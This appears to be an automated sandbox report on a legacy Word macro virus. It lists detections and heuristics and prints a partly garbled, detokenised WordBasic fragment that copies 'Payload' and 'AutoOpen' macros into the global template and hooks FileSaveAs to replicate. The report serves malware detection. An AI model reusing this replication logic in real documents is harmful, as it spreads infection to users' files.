MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits legacy WordBasic macro virus markers, indicating a malicious intent to execute code. The document body contains obfuscated strings and references to 'Payload' and 'AutoOpen', suggesting the macro attempts to perform malicious actions when the document is opened. The presence of 'RSN MACRO VIRUS' and 'Goat file' further supports its classification as a macro-based threat.
Heuristics 3
-
ClamAV: Win.Trojan.Imposter-6 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Imposter-6
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCEThe Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
wordbasic_macros.txt |
wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 489 bytes |
SHA-256: 2af3f6df0ee6fa38e6bf425c7e6b71b016048149e5c656bc89d07f4ac8c7d5bb |
|||
Preview scriptFirst 1,000 lines of the extracted script
= 24943
357 =
MAIN
, - * Abort
dlg @cmd0054
dlg
dlg
dlg = 0 dlg = 1
Me$ = @cmd8025
Macro$ = Me$ = ":Payload"
@cmd80c2 "Global:FileSaveAs" , Macro$
Macro$ = Me$ = ":AutoOpen"
@cmd80c2 "Global:Payload" , Macro$
Err 102 @cmd0054 dlg
MAIN
, - * Abort
Installed = 0
I = 1 @cmd80b7 0 , 0
@cmd80b8 I , 0 , 0 = "PayLoad" Installed = 1
Installed = 0
Me$ = @cmd8025
Macro$ = Me$ = ":Payload"
@cmd80c2 Macro$ , "Global:FileSaveAs"
Macro$ = Me$ = ":AutoOpen"
@cmd80c2 Macro$ , "Global:Payload"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.